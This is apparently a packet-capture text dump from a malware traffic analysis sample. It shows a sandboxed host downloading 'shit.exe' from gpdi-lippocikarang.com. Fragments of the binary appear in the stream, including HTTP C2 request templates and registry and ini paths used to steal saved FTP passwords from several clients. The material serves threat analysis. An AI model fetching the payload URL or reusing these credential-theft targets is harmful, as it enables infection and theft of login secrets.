gpdi-lippocikarang.com shit.exe Malware Traffic Analysis Sample PCAP file download

2016-09-15 09:28:09.114046 IP 192.168.56.13.63558 > 8.8.8.8.53: 27577+ A? gpdi-lippocikarang.com. (40)
E..D……1…8……F.5.0..k…………gpdi-lippocikarang.com…..
2016-09-15 09:28:09.137827 IP 8.8.8.8.53 > 192.168.56.13.63558: 27577 1/0/0 A 111.68.116.106 (56)
E..T….1………8..5.F.@..k…………gpdi-lippocikarang.com……………..oDtj
2016-09-15 09:28:09.165003 IP 192.168.56.13.49228 > 111.68.116.106.80: Flags [S], seq 1038097904, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…….8.oDtj.L.P=……… .V?…………..
2016-09-15 09:28:09.485914 IP 111.68.116.106.80 > 192.168.56.13.49228: Flags [S.], seq 4072845162, ack 1038097905, win 14600, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
EH.4..@.,.r.oDtj..8..P.L…j=…..9……………..
2016-09-15 09:28:09.486014 IP 192.168.56.13.49228 > 111.68.116.106.80: Flags [.], ack 1, win 256, length 0
E..(..@…….8.oDtj.L.P=……kP…….
2016-09-15 09:28:09.486511 IP 192.168.56.13.49228 > 111.68.116.106.80: Flags [P.], seq 1:189, ack 1, win 256, length 188: HTTP: GET /emaxx/shit.exe HTTP/1.0
E…..@…….8.oDtj.L.P=……kP….;..GET /emaxx/shit.exe HTTP/1.0
Host: gpdi-lippocikarang.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

2016-09-15 09:28:09.807923 IP 111.68.116.106.80 > 192.168.56.13.49228: Flags [.], ack 189, win 123, length 0
EH.(.4@.,…oDtj..8..P.L…k=…P..{……….
2016-09-15 09:28:09.807934 IP 111.68.116.106.80 > 192.168.56.13.49228: Flags [.], seq 1:1461, ack 189, win 123, length 1460: HTTP: HTTP/1.1 200 OK
EH…5@.,..:oDtj..8..P.L…k=…P..{….HTTP/1.1 200 OK
Date: Thu, 15 Sep 2016 13:28:09 GMT
Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 12 Sep 2016 21:17:19 GMT
ETag: “24e069b-16a00-53c560574923d”
Accept-Ranges: bytes
Content-Length: 92672
Connection: close
Content-Type: application/x-msdownload

MZ………………….@………………………………………  .!..L.!This program cannot be run in DOS mode..

 

2016-09-15 09:31:19.346493 IP 111.68.116.106.80 > 192.168.56.13.49237: Flags [.], seq 77381:78841, ack 189, win 123, length 1460: HTTP
EH..e.@.,..poDtj..8..P.UW8k.U..rP..{.l..urrentVersion\Explorer\Shell Folders.explorer.exe.S-1-5-18…..SeImpersonatePrivilege.SeTcbPrivilege.SeChangeNotifyPrivilege.SeCreateTokenPrivilege.SeBackupPrivilege.SeRestorePrivilege.SeIncreaseQuotaPrivilege.SeAssignPrimaryTokenPrivilege..POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

.Content-Length:.Location:.GET %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

……\*.*.*.*.HWID.{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}.GetNativeSystemInfo.kernel32.dll.IsWow64Process.Software\Far\Plugins\FTP\Hosts.Software\Far2\Plugins\FTP\Hosts.Software\Far Manager\Plugins\FTP\Hosts.Software\Far\SavedDialogHistory\FTPHost.Software\Far2\SavedDialogHistory\FTPHost.Software\Far Manager\SavedDialogHistory\FTPHost.Password.HostName.User.Line.wcx_ftp.ini.\GHISLER.InstallDir.FtpIniName.Software\Ghisler\Windows Commander.Software\Ghisler\Total Commander.\Ipswitch.Sites\.\Ipswitch\WS_FTP.\win.ini..ini.WS_FTP.DIR.DEFDIR.CUTEFTP.QCHistory.Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar.Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar.Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar.Software\GlobalSCAPE\Cute: